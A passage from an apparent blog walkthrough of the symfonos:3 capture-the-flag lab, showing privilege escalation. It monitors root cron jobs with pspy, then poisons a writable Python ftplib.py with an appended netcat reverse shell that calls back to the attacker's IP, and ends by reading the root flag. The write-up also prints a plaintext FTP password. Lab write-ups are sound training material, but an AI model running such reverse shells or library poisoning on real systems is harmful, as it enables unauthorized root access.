Connecting to 192.168.103.3:8000... connected.                                                                                                            
HTTP request sent, awaiting response... 200 OK                                                                                                            
Length: 3104768 (3.0M) [application/octet-stream]                                                                                                         
Saving to: ‘pspy64’                                                                                                                                       
                                                                                                                                                          
pspy64                                 100%[==========================================================================>]   2.96M  --.-KB/s    in 0.03s    
                                                                                                                                                          
2024-11-25 22:03:57 (101 MB/s) - ‘pspy64’ saved [3104768/3104768]                                                                                         
                                                                                                                                                          
hades@symfonos3:/tmp$ ls -al pspy64                                                                                                                              
total 3068                                                                                                                                                                                                                                                                                                                                                         
-rw-r--r--  1 hades hades 3104768 Nov 25 22:02 pspy64                                                                                                                                                                                                  
hades@symfonos3:/tmp$ 

4. Ensure the pspy64 binary has executable permissions by listing files and directories. If not, modify them using: chmod +x pspy64

hades@symfonos3:/tmp$ chmod +x pspy64 
hades@symfonos3:/tmp$ ls -al pspy64                                                                                                                       
-rwxr-xr-x 1 hades hades 3104768 Nov 25 22:02 pspy64                                                                                                      
hades@symfonos3:/tmp$

5. Execute the tool on the target to monitor system processes in real time.

hades@symfonos3:/tmp$ ./pspy64                                                                                                                            
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d                                                                             
                                                                                                                                                          
                                                                                                                                                          
     ██▓███    ██████  ██▓███ ▓██   ██▓                                                                                                                   
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒                                                                                                                   
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░                                                                                                                   
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░                                                                                                                   
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░                                                                                                                   
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒                                                                                                                    
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░                                                                                                                    
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░                                                                                                                     
                   ░           ░ ░                                                                                                                        
                               ░ ░                                                                                                                        
                                                                                                                                                          
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)                                                                          
Draining file system events due to startup...                                                                                                             
done                                                                                                                                                      
2024/11/25 22:04:45 CMD: UID=1000  PID=1453   | ./pspy64                                                                                                  
2024/11/25 22:04:45 CMD: UID=0     PID=1435   |                                                                                                           
2024/11/25 22:04:45 CMD: UID=0     PID=1403   |                                                                                                           
2024/11/25 22:04:45 CMD: UID=1000  PID=1392   | -bash                                                                                                     
2024/11/25 22:04:45 CMD: UID=1000  PID=1391   | sshd: hades@pts/1                                                                                         
2024/11/25 22:04:45 CMD: UID=1000  PID=1385   | (sd-pam)                                                                                                  
2024/11/25 22:04:45 CMD: UID=1000  PID=1384   | /lib/systemd/systemd --user                                                                               
2024/11/25 22:04:45 CMD: UID=0     PID=1379   | sshd: hades [priv]                                                                                        
2024/11/25 22:04:45 CMD: UID=0     PID=1349   |                                                                                                           
2024/11/25 22:04:45 CMD: UID=1001  PID=1335   | python -m SimpleHTTPServer                                                                                
2024/11/25 22:04:45 CMD: UID=1001  PID=1329   | tcpdump -i any -w capture.pcap                                                                            
2024/11/25 22:04:45 CMD: UID=1001  PID=1231   | /bin/bash 
2024/11/25 22:04:45 CMD: UID=1001  PID=1230   | python -c import pty;pty.spawn('/bin/bash') 
2024/11/25 22:04:45 CMD: UID=1001  PID=1211   | bash 
2024/11/25 22:04:45 CMD: UID=1001  PID=1210   | /bin/bash /usr/lib/cgi-bin/underworld 
2024/11/25 22:04:45 CMD: UID=0     PID=1138   | 
2024/11/25 22:04:45 CMD: UID=0     PID=1136   | 
2024/11/25 22:04:45 CMD: UID=1001  PID=1067   | /usr/sbin/apache2 -k start 
2024/11/25 22:04:45 CMD: UID=1001  PID=1063   | /usr/sbin/apache2 -k start 
2024/11/25 22:04:45 CMD: UID=1001  PID=1015   | /usr/sbin/apache2 -k start 
2024/11/25 22:04:45 CMD: UID=1001  PID=1014   | /usr/sbin/apache2 -k start 
2024/11/25 22:04:45 CMD: UID=1001  PID=1010   | /usr/sbin/apache2 -k start 
2024/11/25 22:04:45 CMD: UID=1001  PID=1008   | /usr/sbin/apache2 -k start 
2024/11/25 22:04:45 CMD: UID=1001  PID=1002   | /usr/sbin/apache2 -k start 
2024/11/25 22:04:45 CMD: UID=1001  PID=944    | /usr/sbin/apache2 -k start 
2024/11/25 22:04:45 CMD: UID=1001  PID=676    | /usr/sbin/apache2 -k start 
2024/11/25 22:04:45 CMD: UID=1001  PID=673    | /usr/sbin/apache2 -k start 
2024/11/25 22:04:45 CMD: UID=105   PID=655    | /usr/sbin/exim4 -bd -q30m 
2024/11/25 22:04:45 CMD: UID=1000  PID=647    | proftpd: (accepting connections)               
2024/11/25 22:04:45 CMD: UID=0     PID=643    | /usr/bin/python3 /usr/bin/fail2ban-server -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid -x -b                                                                                                                                                
2024/11/25 22:04:45 CMD: UID=0     PID=412    | /usr/sbin/apache2 -k start 
2024/11/25 22:04:45 CMD: UID=0     PID=401    | /sbin/dhclient -nw 
2024/11/25 22:04:45 CMD: UID=0     PID=373    | /sbin/agetty --noclear tty1 linux 
2024/11/25 22:04:45 CMD: UID=0     PID=371    | /usr/sbin/sshd -D 
2024/11/25 22:04:45 CMD: UID=0     PID=369    | /usr/sbin/cron -f 
2024/11/25 22:04:45 CMD: UID=0     PID=366    | /lib/systemd/systemd-logind 
2024/11/25 22:04:45 CMD: UID=106   PID=352    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation 
2024/11/25 22:04:45 CMD: UID=0     PID=341    | /usr/sbin/rsyslogd -n 
2024/11/25 22:04:45 CMD: UID=0     PID=285    | 
2024/11/25 22:04:45 CMD: UID=100   PID=233    | /lib/systemd/systemd-timesyncd 
2024/11/25 22:04:45 CMD: UID=0     PID=211    | /lib/systemd/systemd-udevd 
2024/11/25 22:04:45 CMD: UID=0     PID=183    | 
2024/11/25 22:04:45 CMD: UID=0     PID=178    | /lib/systemd/systemd-journald 
2024/11/25 22:04:45 CMD: UID=0     PID=152    | 
2024/11/25 22:04:45 CMD: UID=0     PID=151    | 
2024/11/25 22:04:45 CMD: UID=0     PID=141    | 
2024/11/25 22:04:45 CMD: UID=0     PID=115    | 
2024/11/25 22:04:45 CMD: UID=0     PID=112    | 
2024/11/25 22:04:45 CMD: UID=0     PID=111    | 
2024/11/25 22:04:45 CMD: UID=0     PID=109    | 
2024/11/25 22:04:45 CMD: UID=0     PID=108    | 
2024/11/25 22:04:45 CMD: UID=0     PID=107    | 
2024/11/25 22:04:45 CMD: UID=0     PID=106    | 
2024/11/25 22:04:45 CMD: UID=0     PID=105    | 
2024/11/25 22:04:45 CMD: UID=0     PID=104    | 
2024/11/25 22:04:45 CMD: UID=0     PID=103    | 
2024/11/25 22:04:45 CMD: UID=0     PID=79     | 
2024/11/25 22:04:45 CMD: UID=0     PID=42     | 
2024/11/25 22:04:45 CMD: UID=0     PID=41     | 
2024/11/25 22:04:45 CMD: UID=0     PID=29     | 
2024/11/25 22:04:45 CMD: UID=0     PID=28     | 
2024/11/25 22:04:45 CMD: UID=0     PID=27     | 
2024/11/25 22:04:45 CMD: UID=0     PID=26     | 
2024/11/25 22:04:45 CMD: UID=0     PID=25     | 
2024/11/25 22:04:45 CMD: UID=0     PID=24     | 
2024/11/25 22:04:45 CMD: UID=0     PID=23     | 
2024/11/25 22:04:45 CMD: UID=0     PID=22     | 
2024/11/25 22:04:45 CMD: UID=0     PID=21     | 
2024/11/25 22:04:45 CMD: UID=0     PID=19     | 
2024/11/25 22:04:45 CMD: UID=0     PID=18     | 
2024/11/25 22:04:45 CMD: UID=0     PID=17     | 
2024/11/25 22:04:45 CMD: UID=0     PID=16     | 
2024/11/25 22:04:45 CMD: UID=0     PID=15     | 
2024/11/25 22:04:45 CMD: UID=0     PID=14     | 
2024/11/25 22:04:45 CMD: UID=0     PID=13     | 
2024/11/25 22:04:45 CMD: UID=0     PID=12     | 
2024/11/25 22:04:45 CMD: UID=0     PID=11     | 
2024/11/25 22:04:45 CMD: UID=0     PID=10     | 
2024/11/25 22:04:45 CMD: UID=0     PID=9      | 
2024/11/25 22:04:45 CMD: UID=0     PID=8      | 
2024/11/25 22:04:45 CMD: UID=0     PID=7      | 
2024/11/25 22:04:45 CMD: UID=0     PID=5      | 
2024/11/25 22:04:45 CMD: UID=0     PID=3      | 
2024/11/25 22:04:45 CMD: UID=0     PID=2      | 
2024/11/25 22:04:45 CMD: UID=0     PID=1      | /sbin/init 
2024/11/25 22:04:54 CMD: UID=0     PID=1460   | 
2024/11/25 22:05:01 CMD: UID=0     PID=1461   | /usr/sbin/cron -f 
2024/11/25 22:05:01 CMD: UID=0     PID=1462   | /usr/sbin/CRON -f 
2024/11/25 22:05:01 CMD: UID=0     PID=1463   | /bin/sh -c /usr/bin/curl --silent -I 127.0.0.1 > /opt/ftpclient/statuscheck.txt 
2024/11/25 22:06:01 CMD: UID=0     PID=1465   | /usr/sbin/CRON -f 
2024/11/25 22:06:01 CMD: UID=0     PID=1464   | /usr/sbin/cron -f 
2024/11/25 22:06:01 CMD: UID=0     PID=1466   | /usr/sbin/CRON -f 
2024/11/25 22:06:01 CMD: UID=0     PID=1467   | /usr/sbin/CRON -f 
2024/11/25 22:06:01 CMD: UID=0     PID=1469   | /bin/sh -c /usr/bin/python2.7 /opt/ftpclient/ftpclient.py 
2024/11/25 22:06:01 CMD: UID=0     PID=1468   | /bin/sh -c /usr/bin/curl --silent -I 127.0.0.1 > /opt/ftpclient/statuscheck.txt 
2024/11/25 22:06:01 CMD: UID=0     PID=1470   | proftpd: (accepting connections)               
2024/11/25 22:06:01 CMD: UID=0     PID=1471   | /usr/sbin/CRON -f 
2024/11/25 22:06:02 CMD: UID=105   PID=1472   | /usr/sbin/sendmail -i -FCronDaemon -B8BITMIME -oem root 
2024/11/25 22:06:02 CMD: UID=1000  PID=1473   | /usr/sbin/exim4 -Mc 1tFmpt-0000Nj-RA 

  • The output reveals critical details about processes running under UID 1001 , associated with the gods group. 
  • These processes inherit the permissions granted to the gods group, allowing specific actions or access.

Upon further analysis of the logs, a key finding stands out— an interesting factor that may allow escalation to a root shell .


Identifying and Analyse Root-Level Processes

The logs highlight a process running with root privileges (UID=0)

This includes CRON jobs and other root-level activities that present potential privilege escalation opportunities. 

Let’s examine these findings:

  • The log shows, a series of processes running with root privileges (UID=0) , including CRON jobs , which execute commands on a schedule. 
  • Among these, a CRON job runs  /usr/bin/curl --silent -I 127.0.0.1 > /opt/ftpclient/statuscheck.txt indicating it writes to a specific file. 
    • If this file or its parent directory is writable by a non-root user , it becomes a potential target for tampering, such as replacing the file with a symlink to a critical system file like,  /etc/crontab , enabling the insertion of malicious commands. 
  • Another key process is the execution of /opt/ftpclient/ftpclient.py , a Python script that runs as root. 
    • If this script is writable, an attacker can modify it to include arbitrary code or commands, like spawning a reverse shell or executing /bin/bash .
  • The ProFTPD service is also running and may present vulnerabilities. 
    • If it is misconfigured or outdated, allowing attackers to exploit it for privilege escalation.

These factors, including the root-level CRON jobs, writable resources, and potentially vulnerable services, create an opportunity for privilege escalation and unauthorized access to the root.


Gain Root Shell via Writable System Library and CRON Job Exploitation

Next, we should review the /opt/ftpclient/ftpclient.py script to understand its functionality and evaluate how it might be exploited. 

hades@symfonos3:/tmp$ cat /opt/ftpclient/ftpclient.py
import ftplib                                                                                                                                             
                                                                                                                                                          
ftp = ftplib.FTP('127.0.0.1')                                                                                                                             
ftp.login(user='hades', passwd='PTpZTfU4vxgzvRBE')                                                                                                        
                                                                                                                                                          
ftp.cwd('/srv/ftp/')                                                                                                                                      
                                                                                                                                                          
def upload():                                                                                                                                             
    filename = '/opt/client/statuscheck.txt'                                                                                                              
    ftp.storbinary('STOR '+filename, open(filename, 'rb'))                                                                                                
    ftp.quit()                                                                                                                                            
                                                                                                                                                          
upload()                                                                                                                                                  
hades@symfonos3:/tmp$

Upon analysis, the script reveals:

  1. The ftpclient.py program automates the upload of a file to an FTP server running on 127.0.0.1 (localhost)
  2. It establishes an FTP connection using the credentials and the script navigates to the /srv/ftp/ directory on the FTP server.
  3. The upload() function handles the upload of the /opt/client/statuscheck.txt file to the server's current working directory using the ftp.storbinary() method.
  4. After successfully uploading the file, the connection is terminated with ftp.quit() .

Upon correlating this script with the CRON job, we observe that the CRON job periodically executes ftpclient.py with root privileges to upload the statuscheck.txt file. 

This setup provides two potential avenues for exploitation:

  1. The first method is by manipulating the Input File. Here, the statuscheck.txt file, used as input, might be writable by non-root users. If this is the case, injecting malicious content or commands into this file could result in those commands being executed with root privileges during the upload process.
  2. The other one is by tampering with the Script. If the ftpclient.py script itself is writable, it could be modified to include malicious commands or create a reverse shell, which would also execute with root privileges during the scheduled CRON job.

To proceed, the next logical step is to thoroughly investigate the file and directory permissions for /opt/ftpclient/ftpclient.py, /opt/client/statuscheck.txt , and their parent directories. This investigation will help determine potential points of tampering that could be exploited to gain root access.


Tampering with the Script

Rather than modifying the current Python program directly, which might cause issues, we will use a different approach. The script relies on Python's ftplib library. If we can modify this library with injected malicious code, it will execute the next time the CRON job triggers the script.

Let's start by locating the ftplib library. 

hades@symfonos3:/tmp$ find / -iname '*ftplib*' 2>/dev/null
/usr/lib/python2.7/ftplib.pyc                                                                                                                             
/usr/lib/python2.7/ftplib.py                                                                                                                              
/usr/lib/python3.5/__pycache__/ftplib.cpython-35.pyc                                                                                                      
/usr/lib/python3.5/ftplib.py                                                                                                                              
hades@symfonos3:/tmp$ 

Using the command, we identify the locations of the ftplib.py library files for Python 2.7 and Python 3.5.

Next, we check the permissions on /usr/lib/python2.7/ftplib.py

hades@symfonos3:/tmp$ ls -al  /usr/lib/python2.7/ftplib.py                                                                                                                              
-rwxrw-r--  1 root gods 37755 Sep 26  2018   /usr/lib/python2.7/ftplib.py                                                           
hades@symfonos3:/tmp$ 

The output reveals that the file is writable by the current user ( -rwxrw-r-- ), which indicates an improper configuration, as critical system libraries should not be user-writable.

Since the library is writable, we can append malicious code to it. 

hades@symfonos3:/tmp$ nano  /usr/lib/python2.7/ftplib.py

We choose to append a reverse shell command to the library. But before doing that, we need to set up a Netcat listener on the attacker's machine to receive the reverse shell connection.

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...

Once the listener is set up, we execute the following command to append the reverse shell to ftplib.py

hades@symfonos3:/tmp$ echo "os.system('nc -e /bin/bash 192.168.103.3 1234')" >> /usr/lib/python2.7/ftplib.py
hades@symfonos3:/tmp$ 

This command uses the os module to execute a reverse shell, connecting back to the attacker's machine on the IP address and port 1234.

Next, when the CRON job runs and executes the ftpclient.py script, it imports ftplib, which now contains the malicious code. This causes the reverse shell to execute with root privileges, establishing a connection back to the attacker.

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.103.3] from (UNKNOWN) [192.168.103.15] 44454

Finally, we now have a root shell. 

whoami
root

Running the whoami command confirms our assumption. 


Upgrade Shell and access root flag

The shell does not look like interactive.  To spawn a fully interactive shell, we run the command: 

python -c "import pty;pty.spawn('/bin/bash')"

python -c "import pty;pty.spawn('/bin/bash')"
root@symfonos3:~#

This provides us with a fully interactive root shell, giving us full control of the system. We can now change the directory to /root and check for the root flag. 

root@symfonos3:~# cd /root
cd /root
root@symfonos3:~# ls -al
ls -al
total 28
drwx------  4 root root 4096 Apr  6  2020 .
drwxr-xr-x 22 root root 4096 Jul 19  2019 ..
lrwxrwxrwx  1 root root    9 Jul 20  2019 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwx------  2 root root 4096 Jul 20  2019 .cache
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root 1279 Jul 20  2019 proof.txt
drwxr-xr-x  2 root root 4096 Apr  6  2020 .ssh
root@symfonos3:~# 

Using the cat command, we reveal the root flag.

root@symfonos3:~# cat proof.txt
cat proof.txt

        Congrats on rooting symfonos:3!
                                        _._
                                      _/,__\,
                                   __/ _/o'o
                                 /  '-.___'/  __
                                /__   /\  )__/_))\
     /_/,   __,____             // '-.____|--'  \\
    e,e / //  /___/|           |/     \/\        \\
    'o /))) : \___\|          /   ,    \/         \\
     -'  \\__,_/|             \/ /      \          \\
             \_\|              \/        \          \\
             | ||              <    '_    \          \\
             | ||             /    ,| /   /           \\
             | ||             |   / |    /\            \\
             | ||              \_/  |   | |             \\
             | ||_______________,'  |__/  \              \\
              \|/_______________\___/______\_             \\
               \________________________     \__           \\        ___
                  \________________________    _\_____      \\ _____/
                     \________________________               \\
        ~~~~~~~        /  ~~~~~~~~~~~~~~~~~~~~~~~~~~~  ~~ ~~~~\\~~~~
            ~~~~~~~~~~~~~~    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~    //

        Contact me via Twitter @zayotic to give feedback!

root@symfonos3:~# 
Finally! we now have the root flag. 
Tags

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!